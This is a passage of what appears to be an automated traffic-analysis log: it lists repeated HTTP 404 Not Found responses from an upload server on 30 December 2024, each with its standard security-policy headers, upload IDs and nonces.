ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5-yy1lnQegMSWXV5_qtixuAsg15L25M5idbxE8pWe1ulbfhPZ--cRApXuhHMPjON42nNiGJxQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:20 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-1uzGSilDyRMcTPHMa0H6Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6WzJCHHFCitdly-6sDww3fQihnAeOrZ4Q1qMY9CHB5sVq1wWUQNKZiu8w8FpwpbasKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-YFbwMx68ooDA5V73JvI3Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lQun2pwI-_fZ7VQBA-5boXVt7qC0bOuHMkaQrEVZ_fhDewdBV2uVav1Q-z30CcrA_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x4mOr7Ug1u9nrwJskkTDdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC57s5J1nJCb35vBn4m1xPQBBL1wzk6KlKSRAB7caIZrZZJJCWeuwYe24DCOkMWLvEPqOaBVO9EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:23 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Nxh5i3nJ4tetKMuZ5T9-Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59Sdkyv2ux1gBeG63q0xc-WTy238cTxQUab6Z1Yjz6x15FkOUdNHk_3iqM1xkLBwOghMc_-08Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-DceZHgr2ScX6ZlEZnGgEtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4D-GG-RPf1eawJzoz9UdypHlaJREhrExNkmAj3txLz2p8dIWu2IY-E7haAGDNfF1YYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:24 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U5vZzP7wGK2O9taR9Pi_rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4iHpJ_FutwIKcUQSjSpPUTvSXHL81hvbkq4dBjDM8NZu_B5tOxBc1FBj5XjN2lCPMSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-m-0ljyCkE6a4MskDahHYVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45BIOhOERzdvA9VjdHpPsxsXEI7YV1viQZGBAOD4oB752YF6dBLrY04yw2ATVCZIAxWMW9IYkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-p3s5diROrRGM6ULqVv9B4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4b0UZLAT798HZAbBJTykZ34GBErku33TJ6pcvb4JZS4b6-nhX5_JJaw3Rd-brlAk5d5D8uHWoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Oji1xqDDsPCoXnltD1_51A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4IOpGA8Ao2P20TgHDrxvot3lOI0h_vJjeYmv8bO54H1CdIiT8NreImJfuZj5BAo8-qContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-4TSUNT34mCQ5ghWjHmM4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WOSPWpM7pzX4ZiD-mZe-mvakOBU98m260O6fpv8xExiqp48-Yxc63hoqZnbVEZkzdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-tvbMUvniZ0jel4GCV24lRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ps02OvxWtNMMAe_BEi2q9G3wM9ThvNxUEqVFhm83fiFu-W0kBcPjdWKnJpZdRq44hContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-_XcyCMOs4X9GLi9bHjGAzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4MK3E-AwcJulIXQ0UZgkN809tKNDavKOseqoznTaoV_kn5cuKzsLmzS7f5khnxrfxAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Kyof0GHRxxHTaM6xEMabOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zNxRd2FZz7q2nYkKsSu9LoSiiOMsDs0Qn_5xLE6tLAXIcEgi9gQvjY0vhm9gEDcHtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2WIm3q_OXsY1STAuL6t_gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZJtHK0kXHSAbONHcd2Aj41th3nrdAk60F-GSqsveAVAxMfvRqVLbTQ0xWjMDiEUBf1UymHYkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:32 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-AxGsGedNodCh4Yi30VNLCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4R2GpV991AhRbKqc6ICKlzZU2qexi5lCWOHYFd0eXG9PX3SEhTbwgkhRK8LpWGE5tXt89FTf4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-7JtuJjg9kPR51QbTWyN2Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7x5jloO1fPXoo9HMImHXRcaftSeG47HoDh46372HnTzuleZrj_ele8bFIjbnWdEssNeA3jXq0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_fNPlzqxrP4WsNjS6AsQiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5W6YnuABOaMnzcH905lH1YuLU8TSDgxUapWGv2OEv6pcr09ijtmnsMS5Fb_0ersk9PContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EZFpycfDYrroUTPpizE3Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75v8hsAMmHLV5cMDrZEPqXt3-JFWhA7z2XQXISy9Psi0regh-UrBla2ovfTX7WbA9X9etom9EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-a2n-I9hjO6niavD8rIUFqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fI9Y1fM-Z4_V2C6mkWRbnWPDz9pi3vcBftr46m-A4dwB9cjIzT1kUt9BHzyihhGCISH70x2oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:36 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6Tie74mkdyyaZKr5qjkeGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
